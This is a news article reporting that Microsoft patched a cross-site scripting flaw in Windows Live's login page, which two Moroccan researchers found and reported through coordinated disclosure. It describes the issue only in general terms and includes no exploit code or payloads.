/>
X
Innovation

Microsoft patches Windows Live identity theft flaw

Microsoft recently fixed an XSS flaw in its Windows Live service that allowed an attacker to steal victims' online identities. The vulnerability was disclosed by two security researchers from Morocco.
emil-protalinski.jpg
Written by Emil Protalinski, Contributor on
Microsoft patches Windows Live identity theft flaw

21-year-old Abdeljalil S'hit and 23-year-old Yasser Aboukir recently discovered a serious vulnerability in Microsoft's Windows Live service. The two young security researchers from Morocco responsibly reported it to the software giant even though the company does not provide any compensation for doing so.

The vulnerability in question leveraged Cross-Site Scripting (XSS) to execute a malicious script. More specifically, the two researchers managed to cause an error on the Windows Live login page (as you can see above), and once the victim clicked on the "Continue" button, their malicious script would be executed.

The XSS flaw meant that an attacker could impersonate a Windows Live user by gaining full control of the victim's cookies. Combined with social engineering, this technique could be used to steal a victim's Windows Live identity with ease. Aboukir informed me that the vulnerability was described as "critical" by the Microsoft Security Research Center (MSRC).

While the MSRC was internally investigation the issue, the two young men were asked to respect Microsoft's coordinated vulnerability disclosure guidelines and not report the issue publicly until it could be addressed. Apparently, it took Microsoft three months to come up with a patch.

"We have created a code change to address the issue and are now testing the changes," a Microsoft spokesperson told the duo. "Because changes to the site may affect a large number of users the testing requirements prior to production release are lengthy. Based on the testing schedule and barring any significant regressions the team expects to release an update into production in early May."

Aboukir tells me, however, that the issue was not completely resolved until mid-June. Now that it has been, however, he felt comfortable to share his story with me. He also noted: "You are the first to be contacted about this issue. This 0day was fixed according to responsible disclosure ethics and was not communicated for any third party."

Aboukir describes himself as "a fresh graduated engineer specialized on information security." He described his friend as a "Computer Science engineering student." Both have been featured on Microsoft's list of June 2012 Security Researchers for properly disclosing a valid flaw to Redmond. There is no doubt in my mind that the two have a bright future ahead of them.

As for the issue at hand, I have contacted Microsoft for a statement and will update you if I hear back.

Update at 11:00PM PST - "We quickly addressed the vulnerability in question to help keep customers protected and appreciate the researchers using Coordinated Vulnerability Disclosure to assist in us working toward a fix in a coordinated manner," a Microsoft spokesperson said in a statement.

See also:

Editorial standards

Related

Trade in your old devices for Amazon gift cards. Here's how
Google Pixel Car Crash Detection

Trade in your old devices for Amazon gift cards. Here's how

Southwest Airlines has a big problem and customers may not know it
screen-shot-2022-09-27-at-9-38-07-am.png

Southwest Airlines has a big problem and customers may not know it

Tesla's first Optimus robot comes alive, Musk says it will cost less than $20,000
tesla-optimus-waves-hello

Tesla's first Optimus robot comes alive, Musk says it will cost less than $20,000